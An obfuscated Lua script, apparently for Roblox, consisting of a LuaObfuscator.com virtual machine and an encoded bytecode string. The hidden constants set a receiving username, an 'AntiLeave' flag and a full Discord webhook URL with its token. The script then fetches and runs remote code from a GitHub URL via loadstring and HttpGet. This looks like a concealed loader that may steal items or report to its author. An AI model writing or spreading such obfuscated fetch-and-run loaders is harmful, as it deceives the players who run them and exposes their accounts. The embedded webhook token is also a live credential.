--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v99=v5(v71,v19);v19=nil;return v99;else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((558 + 62) -(555 + 64)))) + (932 -(857 + 74)))) ;return v72-(v72%(569 -(367 + (1838 -(1523 + 114))))) ;else local v73=(929 -(214 + (1015 -302)))^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=1065 -(68 + 222 + 775) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + 0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23()local v38=(0 -0) -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(351 -(87 + 263))) then return (v42 * (16777396 -(49 + 18 + 113))) + (v41 * (48056 + 17480)) + (v40 * (628 -372)) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;v38=2 -1 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,998 -(915 + 82) ,56 -36 ) * ((2 + (0 -0))^(41 -9))) + v43 ;local v47=v20(v44,21,98 -67 );local v48=((v20(v44,1219 -(1069 + 118) )==(2 -(3 -2))) and  -(1 -0)) or ((1298 -(814 + 45)) -(145 + 293)) ;if (v47==(0 + 0)) then if (v46==(1486 -((2458 -1460) + 488))) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=0;end elseif (v47==(2819 -(201 + 571))) then return ((v46==(1138 -(116 + 1022))) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((793 -(368 + 423))^((9 + 154) -111)))) ;end local function v25(v49)local v50;if  not v49 then local v74=(1423 -(630 + 793)) + 0 ;while true do if (v74==(885 -(261 + 624))) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1081 -(1020 + 60)) );v18=v18 + v49 ;local v51={};for v68=1, #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=(1 + 1)) then else v57=nil;v58=nil;v52=1 + 2 ;end if (v52==(532 -(406 + 123))) then v59=nil;v60=nil;v52=1773 -(1749 + 20) ;end if (4==v52) then while true do if (v53==(0 + 0)) then local v95=0;local v96;while true do if (v95==(1322 -(1249 + 73))) then v96=0;while true do if (v96==(1 + 0)) then v53=1146 -(466 + 679) ;break;end if (v96==(0 -0)) then v54=0;v55=nil;v96=2 -1 ;end end break;end end end if ((1901 -(106 + 1794))~=v53) then else local v97=0;while true do if (v97~=(0 + 0)) then else v56=nil;v57=nil;v97=1;end if (v97~=1) then else v53=2;break;end end end if (v53==(1 + 2)) then v60=nil;while true do local v100=0;local v101;while true do if (v100==(0 -0)) then v101=0;while true do if ((0 -0)==v101) then local v106=0;local v107;while true do if (v106==(114 -(4 + 110))) then v107=0;while true do if (v107==1) then v101=1;break;end if (v107==(584 -(57 + 527))) then local v166=1427 -(41 + 1386) ;while true do if (v166~=(103 -(17 + 86))) then else if (v54==2) then local v172=0;local v173;while true do if (v172~=0) then else v173=0;while true do if (v173~=0) then else local v177=0 + 0 ;while true do if ((0 -0)~=v177) then else for v186=1,v59 do local v187=0;local v188;local v189;local v190;while true do if (v187==(0 -0)) then v188=166 -(122 + 44) ;v189=nil;v187=1 -0 ;end if ((3 -2)~=v187) then else v190=nil;while true do if (v188==0) then local v193=0;while true do if (v193==1) then v188=1;break;end if (v193==(0 + 0)) then v189=v21();v190=nil;v193=1 + 0 ;end end end if (1==v188) then if (v189==1) then v190=v21()~=(0 -0) ;elseif (v189==(67 -(30 + 35))) then v190=v24();elseif (v189~=3) then else v190=v25();end v60[v186]=v190;break;end end break;end end end v58[3 + 0 ]=v21();v177=1258 -(1043 + 214) ;end if (v177==1) then v173=1;break;end end end if (v173==1) then for v180=3 -2 ,v23() do local v181=0;local v182;local v183;local v184;while true do if (v181==(1213 -(323 + 889))) then v184=nil;while true do if (v182~=1) then else while true do if (v183==0) then v184=v21();if (v20(v184,1,2 -1 )==(580 -(361 + 219))) then local v197=320 -(53 + 267) ;local v198;local v199;local v200;local v201;local v202;while true do if (0==v197) then v198=0 + 0 ;v199=nil;v197=414 -(15 + 398) ;end if (v197==(983 -(18 + 964))) then v200=nil;v201=nil;v197=2;end if (v197~=2) then else v202=nil;while true do if (0~=v198) then else v199=0 -0 ;v200=nil;v198=1 + 0 ;end if (v198~=(1 + 0)) then else local v203=850 -(20 + 830) ;while true do if (v203==(0 + 0)) then v201=nil;v202=nil;v203=127 -(116 + 10) ;end if (v203==1) then v198=1 + 1 ;break;end end end if (v198==2) then while true do if (v199==3) then if (v20(v201,741 -(542 + 196) ,3)==1) then v202[8 -4 ]=v60[v202[2 + 2 ]];end v55[v180]=v202;break;end if ((1 + 0)==v199) then local v205=0 + 0 ;while true do if (0~=v205) then else v202={v22(),v22(),nil,nil};if (v200==0) then local v209=1551 -(1126 + 425) ;local v210;local v211;local v212;while true do if (v209~=(406 -(118 + 287))) then else v212=nil;while true do if (1==v210) then while true do if (0~=v211) then else v212=0;while true do if (v212==(0 -0)) then v202[1124 -(118 + 1003) ]=v22();v202[11 -7 ]=v22();break;end end break;end end break;end if (v210~=(377 -(142 + 235))) then else local v219=0 -0 ;while true do if ((1 + 0)==v219) then v210=1;break;end if (v219==0) then v211=0;v212=nil;v219=978 -(553 + 424) ;end end end end break;end if (v209~=0) then else v210=0;v211=nil;v209=1 -0 ;end end elseif (v200==(1 + 0)) then v202[3]=v23();elseif (v200==2) then v202[3]=v23() -((2 + 0)^(10 + 6)) ;elseif (v200==3) then local v220=0;local v221;while true do if (v220==0) then v221=0 + 0 ;while true do if (v221==(0 + 0)) then v202[6 -3 ]=v23() -((5 -3)^16) ;v202[8 -4 ]=v22();break;end end break;end end end v205=1 + 0 ;end if (v205==1) then v199=9 -7 ;break;end end end if (v199==(753 -(239 + 514))) then v200=v20(v184,1 + 1 ,1332 -(797 + 532) );v201=v20(v184,3 + 1 ,3 + 3 );v199=2 -1 ;end if (v199==(1204 -(373 + 829))) then local v206=731 -(476 + 255) ;while true do if (1~=v206) then else v199=3;break;end if (v206~=(1130 -(369 + 761))) then else if (v20(v201,1,1)==1) then v202[2 + 0 ]=v60[v202[2]];end if (v20(v201,2 -0 ,3 -1 )==(239 -(64 + 174))) then v202[1 + 2 ]=v60[v202[3 -0 ]];end v206=337 -(144 + 192) ;end end end end break;end end break;end end end break;end end break;end if (v182==(216 -(42 + 174))) then local v192=0;while true do if (1~=v192) then else v182=1 + 0 ;break;end if (v192==0) then v183=0 + 0 ;v184=nil;v192=1;end end end end break;end if (v181==0) then v182=0 + 0 ;v183=nil;v181=1;end end end v54=3;break;end end break;end end end if ((1507 -(363 + 1141))~=v54) then else local v174=0;local v175;while true do if (v174==(1580 -(1183 + 397))) then v175=0;while true do if ((0 -0)==v175) then local v178=0 + 0 ;local v179;while true do if (v178~=(0 + 0)) then else v179=0;while true do if (v179==(1975 -(1913 + 62))) then local v191=0 + 0 ;while true do if (0==v191) then for v195=2 -1 ,v23() do v56[v195-(1934 -(565 + 1368)) ]=v28();end return v58;end end end end break;end end end end break;end end end v166=3 -2 ;end if (v166==(1662 -(1477 + 184))) then v107=1;break;end end end end break;end end end if (v101==1) then if (v54~=(1 -0)) then else local v129=0;while true do if (v129==0) then local v160=0 + 0 ;while true do if (v160==1) then v129=857 -(564 + 292) ;break;end if (v160~=0) then else v58={v55,v56,nil,v57};v59=v23();v160=1;end end end if (v129~=1) then else v60={};v54=2 + 0 ;break;end end end if (v54~=0) then else local v130=476 -(41 + 435) ;local v131;while true do if (v130==(1001 -(938 + 63))) then v131=0;while true do if (v131==1) then v57={};v54=1 + 0 ;break;end if (v131==(1125 -(936 + 189))) then local v171=0;while true do if (v171==1) then v131=1 + 0 ;break;end if (v171==0) then local v176=1613 -(1565 + 48) ;while true do if ((0 + 0)~=v176) then else v55={};v56={};v176=1;end if (v176==(1139 -(782 + 356))) then v171=1;break;end end end end end end break;end end end break;end end break;end end end break;end if ((269 -(176 + 91))~=v53) then else local v98=0 -0 ;while true do if (v98~=1) then else v53=4 -1 ;break;end if (v98~=(1092 -(975 + 117))) then else v58=nil;v59=nil;v98=1876 -(157 + 1718) ;end end end end break;end if (0==v52) then v53=0 + 0 ;v54=nil;v52=1;end if (1~=v52) then else v55=nil;v56=nil;v52=2;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v78=v65;local v79=v66;local v80=v67;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=9) then if (v91<=4) then if (v91<=1) then if (v91==0) then local v108=0;local v109;while true do if (v108==0) then v109=v90[2];v88[v109]=v88[v109](v13(v88,v109 + 1 ,v83));break;end end else v88[v90[2]]=v90[3]~=0 ;end elseif (v91<=2) then do return;end elseif (v91==3) then local v132=v90[2];local v133,v134=v81(v88[v132](v13(v88,v132 + 1 ,v90[3])));v83=(v134 + v132) -1 ;local v135=0;for v150=v132,v83 do local v151=0;while true do if (v151==0) then v135=v135 + 1 ;v88[v150]=v133[v135];break;end end end else local v136=0;local v137;local v138;while true do if (v136==0) then v137=v90[2];v138=v88[v90[3]];v136=1;end if (v136==1) then v88[v137 + 1 ]=v138;v88[v137]=v138[v90[4]];break;end end end elseif (v91<=6) then if (v91==5) then v88[v90[2]][v90[3]]=v90[4];else do return;end end elseif (v91<=7) then v88[v90[2]]=v63[v90[3]];elseif (v91==8) then v88[v90[2]][v90[3]]=v90[4];else v88[v90[2]]();end elseif (v91<=14) then if (v91<=11) then if (v91==10) then local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==1) then v83=(v118 + v116) -1 ;v119=0;v115=2;end if (v115==0) then v116=v90[2];v117,v118=v81(v88[v116](v13(v88,v116 + 1 ,v90[3])));v115=1;end if (v115==2) then for v158=v116,v83 do local v159=0;while true do if (v159==0) then v119=v119 + 1 ;v88[v158]=v117[v119];break;end end end break;end end else local v120=0;local v121;local v122;while true do if (v120==0) then v121=v90[2];v122=v88[v90[3]];v120=1;end if (v120==1) then v88[v121 + 1 ]=v122;v88[v121]=v122[v90[4]];break;end end end elseif (v91<=12) then v63[v90[3]]=v88[v90[2]];elseif (v91==13) then v88[v90[2]]=v90[3];else v88[v90[2]]=v90[3];end elseif (v91<=16) then if (v91>15) then v88[v90[2]]();else v63[v90[3]]=v88[v90[2]];end elseif (v91<=17) then local v127=v90[2];v88[v127]=v88[v127](v13(v88,v127 + 1 ,v83));elseif (v91==18) then v88[v90[2]]=v63[v90[3]];else v88[v90[2]]=v90[3]~=0 ;end v82=v82 + 1 ;end end;end if (0==v64) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503083O00395348574957484503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134312O37363536393039303730333432312F676B4B49624875477335464A4139646C3668754546787477306346776C6756743251434C367A4776536850746A324672594F6C31536C4232382D4267556C45447A5A4D3403093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747300153O00120D3O00023O00120F3O00013O00120D3O00043O00120F3O00033O00120D3O00023O00120F3O00053O002O123O00063O0030083O00070008002O123O00063O0030083O00090008002O123O00063O0030083O000A0008002O123O000B3O002O120001000C3O00200B00010001000D00120D0003000E4O0001000400014O0003000100044O00115O00022O00103O000100012O00063O00017O00",v9(),...);
